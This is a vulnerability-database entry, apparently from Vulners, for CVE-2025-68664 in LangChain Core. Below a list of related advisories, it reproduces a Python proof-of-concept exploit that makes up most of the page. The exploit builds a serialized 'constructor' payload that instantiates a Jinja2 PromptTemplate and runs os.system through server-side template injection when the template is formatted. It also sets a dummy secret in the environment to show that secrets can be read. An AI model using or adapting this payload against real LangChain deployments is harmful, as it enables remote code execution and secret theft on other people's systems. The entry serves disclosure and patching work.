LangChain Core 1.2.4 - SSTI/RCE

🗓️ 29 Apr 2026 00:00:00Reported by banyamerType

Unsafe deserialization in LangChain Core enables SSTI and remote code execution via a crafted PromptTemplate.

Reporter	Title	Published	Views	Family All 36
IBM Security Bulletins	Security Bulletin: LangChain Serialization Injection Vulnerability in dumps()/dumpd() (Fixed in 0.3.81 / 1.2.5) affects watsonx.data	8 Apr 202610:44	–	ibm
IBM Security Bulletins	Security Bulletin: The IBM Maximo Application Suite AI-Service component uses multiple third-party dependencies that contain vulnerabilities associated with multiple CVEs.	2 Feb 202604:24	–	ibm
IBM Security Bulletins	Security Bulletin: Platform Navigator and Automation Assets in IBM Cloud Pak for Integration are vulnerable to multiple vulnerabilities in Node.js and LangChain	25 Feb 202616:32	–	ibm
Chainguard	CVE-2025-68664 vulnerabilities	17 Jan 202601:17	–	cgr
Circl	CVE-2025-68664	23 Dec 202523:44	–	circl
CNNVD	LangChain 代码问题漏洞	23 Dec 202500:00	–	cnnvd
CVE	CVE-2025-68664	23 Dec 202522:47	–	cve
Cvelist	CVE-2025-68664 LangChain serialization injection vulnerability enables secret extraction in dumps/loads APIs	23 Dec 202522:47	–	cvelist
GithubExploit	Exploit for CVE-2025-68664	27 Dec 202506:49	–	githubexploit
EUVD	EUVD-2025-204849	23 Dec 202518:46	–	euvd

# Exploit Title: LangChain Core - SSTI/RCE 
# Date: 2025-12-29
# Exploit Author: Mohammed Idrees Banyamer
# Author Country: Jordan
# Contact: @banyamer_security (Instagram)
# GitHub: https://github.com/mbanyamer
# Vendor Homepage: https://www.langchain.com/
# Software Link: https://pypi.org/project/langchain-core/
# Version: < 0.3.81 and < 1.2.5
# Tested on: Python 3.10 - 3.12
# CVE : CVE-2025-68664
# Description: Exploits unsafe deserialization in langchain_core.load to instantiate a malicious PromptTemplate
#              with Jinja2 format, leading to Server-Side Template Injection and arbitrary command execution.

import os
from langchain_core.load import dumps, load
from langchain_core.prompts import PromptTemplate

# Set a dummy env var (demonstrates potential secret access if needed)
os.environ["TEST_SECRET"] = "secret_value_123"

# Malicious constructor payload targeting PromptTemplate with SSTI
payload = {
    "exploit": {
        "lc": 1,
        "type": "constructor",
        "id": ["langchain_core", "prompts", "prompt", "PromptTemplate"],
        "kwargs": {
            "input_variables": [],
            "template": "{{ config.get('callbacks', {}).get('__builtins__', {}).get('__import__', lambda x: __import__(x))('os').system('id') }}",
            "template_format": "jinja2"
        }
    }
}

# Serialize (dumps does not escape 'lc' key)
serialized = dumps(payload)

# Deserialize - instantiates the malicious PromptTemplate
deserialized = load(serialized, secrets_from_env=True)

# Extract and invoke the malicious prompt → triggers SSTI → RCE
malicious = deserialized["exploit"]
output = malicious.format()

print("[*] Command execution output:")
print(output)

29 Apr 2026 00:00Current

8.2High risk

Vulners AI Score8.2

CVSS 3.18.2 - 9.3

EPSS0.02624

SSVC